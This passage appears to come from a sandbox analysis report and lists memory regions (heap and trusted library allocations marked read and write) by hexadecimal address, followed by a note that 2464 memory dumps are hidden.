page read and write
5934000
heap
page read and write
42C1000
heap
page read and write
7FE89A14000
trusted library allocation
page read and write
429C000
heap
page read and write
26DE000
trusted library allocation
page read and write
36A000
heap
page read and write
4472000
heap
page read and write
59C2000
heap
page read and write
57A3000
heap
page read and write
4C5F000
heap
page read and write
1DB0000
heap
page read and write
32DC000
heap
page read and write
26A5000
trusted library allocation
page read and write
293000
heap
page read and write
42B8000
heap
page read and write
1AB50000
heap
page read and write
There are 2464 hidden memdumps, click here to show them.